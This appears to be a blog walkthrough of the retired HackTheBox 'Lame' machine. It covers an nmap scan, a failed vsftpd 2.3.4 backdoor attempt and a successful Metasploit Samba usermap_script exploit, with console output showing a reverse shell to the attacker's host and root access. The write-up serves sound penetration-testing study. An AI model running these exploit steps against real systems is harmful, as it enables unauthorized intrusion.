A week after completing my OSCP, I was already having withdrawals and signed up for a VIP account on HackTheBox. A VIP account (roughly $12/month) gives you access to retired machines, as well as a smoother experience overall (less crowded). HTB has been a good resource for me so I don’t mind sending them money. : )
HTB rules say not to write walkthroughs for active boxes, so some of the other boxes I’ve done will have to wait until they’re retired. In the meantime, here’s a walkthrough for one of the easier retired boxes, “Lame”.
Side note: I’m trying to remove the word “lame” from my vocabulary.
This box has been rated on the easier end by HTB community members:
We start off with nmap to discover the open ports. We can see that there’s FTP (port 21), SSH (port 22), and two ports relating to Samba (ports 139 and 445).
One of the first things covered in OSCP was anonymous logins to FTP servers, and FTP was the first thing in the Nmap results, so that’s what I tried first:
Success! I was able to login with username “anonymous” and a blank password… but that’s about as far as that idea got me. I wasn’t able to find or add anything useful. So, on to the next idea.
If we check ExploitDB for the version of vsftpd (“Very Secure” FTP) running on this machine, which is 2.3.4, we find a match!
So, let’s fire up Metasploit (
msfconsole) and try it out:
You can use
search vsftpd to find the exploit that ExploitDB is referencing. Then,
use exploit/unix/ftp/vsftpd_234_backdoor and
set RHOST 10.10.10.3 to tell Metasploit which machine to target.
msf > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(unix/ftp/vsftpd_234_backdoor) > show info Name: VSFTPD v2.3.4 Backdoor Command Execution Module: exploit/unix/ftp/vsftpd_234_backdoor Platform: Unix Arch: cmd Privileged: Yes License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2011-07-03 Provided by: hdm <firstname.lastname@example.org> MC <email@example.com> Available targets: Id Name -- ---- 0 Automatic Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 21 yes The target port (TCP) Payload information: Space: 2000 Avoid: 0 characters Description: This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011. References: CVE: Not available OSVDB (73573) http://pastebin.com/AetT9sS5 http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.3 RHOST => 10.10.10.3 msf exploit(unix/ftp/vsftpd_234_backdoor) > run [*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.10.3:21 - USER: 331 Please specify the password. [*] Exploit completed, but no session was created.
However, it doesn’t work. Womp womp. On to the next idea…
Next, we look at the SSH port… is there anything exploitable here? A search of ExploitDB and Metasploit modules (via
search openssh) doesn’t turn up anything too promising, so let’s move onto other ideas. If we didn’t have any untested ports left, I might have dug deeper here, or tried to debug the VsFTPd exploit.
In any case, we move on to the remaining two ports, and the “Samba 3.x – 4.x” software running on them.
Searching ExploitDB for “Samba” returns 5 pages of results (!!). Similarly, a search of Metasploit modules returns a ton of options:
We can narrow down the list a bit based on version number (so, anything that doesn’t apply to versions “3.x – 4x” are out). After that point, we’re still left with a lot of options, so I tend to things down based on the “Rank” in Metasploit, or whether its been verified on ExploitDB.
The first “excellent” option,
is_known_pipename, says in the Metasploit
show info blurb that it requires “valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder.” Since we don’t have that… let’s move on to the next option.
The next option is
usermap_script, a RCE exploit that does not require any authentication. We set our
RHOST to 10.10.10.3:
Then we run the exploit. After avoid the use of Metasploit on the OSCP labs, doing a one-and-done Metasploit RCE module seems a bit like cheating. That’s probably why this box was marked as easy.
So, it works! The shell we get back is kind of crappy, so I use
python -c 'import pty; pty.spawn("/bin/sh")' to make it nicer.
msf exploit(multi/samba/usermap_script) > run [*] Started reverse TCP double handler on 10.10.14.8:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 0UfWkKEzrDN9kk2c; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "0UfWkKEzrDN9kk2c\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.3:55015) at 2019-05-29 21:07:05 -0400 python -c 'import pty; pty.spawn("/bin/sh")' sh-3.2# id id uid=0(root) gid=0(root)
Luckily for us, we’re already
As with all HTB machines, there are two flags we want to get. One is
user.txt in one of the
/home/user directories, and the other is
root.txt in the
After trying the different folders in the
/home directory, we find the user flag at
Then, grabbing the root flag is easy. It’s at
And that’s it! I’m planning on doing more walkthroughs in the future and publishing them as the boxes are retired. 🙂
If you’d like to read more about the Samba vulnerability used to exploit this box, check out CVE-2007-2447 (original Samba.org link here).